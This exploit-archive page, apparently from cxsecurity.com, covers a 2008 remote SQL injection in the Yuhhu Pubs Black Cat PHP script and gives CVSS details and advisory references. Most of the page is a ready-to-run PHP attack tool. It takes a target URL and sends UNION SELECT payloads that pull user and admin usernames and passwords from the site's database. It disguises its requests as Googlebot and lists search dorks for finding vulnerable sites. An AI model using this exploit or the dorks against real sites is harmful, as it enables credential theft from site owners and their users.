Yuhhu Pubs Black Cat Remote SQL Injection Exploit

2008.07.15
Credit: RM
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

<?php /* Coded By RMx Yuhhu Pubs Black Cat Remote SQL Injection Exploit Coderx.Org & Biyosecurity.com Thanx : Liz0zim - Otistiq Script Demo & Sales : http://www.iamilkay.net/index.php/scriptler/arkadaslikscriptleri/yuhhuscript/6-yuhhuserisi/8-pubs Dork --> inurl: browse.groups.php Dork 2 --> inurl:browse.events.php Dork 3 --> browse.music.php Dork 4 --> browse.groups.php */ set_time_limit(0); error_reporting(0); echo " <title>Yuhhu Pubs Exploit [ Coded By RMx ]</title> <form action='' method=post> USERS EXPLOIT :<br> rnek :http://www.example.com<br> <input type=text name='site'> <input type=submit value=RMx> </form>"; if (isset($_POST['site'])) { $site=$_POST['site']; $hacker="browse.groups.php?category=-1+union+select+1,2,3,concat(0x656D61696C3A20,email,0x206B756C6C616E6963693A20,username,0x2073696672653A20,password),5,6,7,8,9+from+joovili_users"; $curl = curl_init(); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_URL, $site."/".$hacker); curl_setopt($curl, CURLOPT_USERAGENT, 'Googlebot/2.1 (+http://www.google.com/bot.html)'); curl_setopt($curl, CURLOPT_REFERER, 'http://www.google.com'); $html = curl_exec($curl); curl_close($curl); preg_match_all('#<td class=\"text_4_css_bold\">(.*)<\/td>#',$html,$huseyin); foreach ($huseyin[1] as $biyosecurity) { echo $biyosecurity ."<br>"; } } echo " <form action='' method=post> ADMIN EXPLOIT :<br> rnek :http://www.example.com<br> <input type=text name='admin'> <input type=submit value=RMx> </form>"; if (isset($_POST['admin'])) { $site=$_POST['admin']; $hacker="browse.groups.php?category=-1+union+select+1,2,3,concat(0x206B756C6C616E6963693A20,admin_username,0x2073696672653A20,admin_password),5,6,7,8,9+from+joovili_admins"; $curl = curl_init(); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_URL, $site."/".$hacker); curl_setopt($curl, CURLOPT_USERAGENT, 'Googlebot/2.1 (+http://www.google.com/bot.html)'); curl_setopt($curl, CURLOPT_REFERER, 'http://www.google.com'); $html = curl_exec($curl); curl_close($curl); preg_match_all('#<td class=\"text_4_css_bold\">(.*)<\/td>#',$html,$huseyin); foreach ($huseyin[1] as $biyosecurity) { echo $biyosecurity ."<br>"; } } ?>

References:

http://xforce.iss.net/xforce/xfdb/43782
http://www.securityfocus.com/bid/30221
http://www.securityfocus.com/archive/1/archive/1/494319/100/0/threaded
http://secunia.com/advisories/31077


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top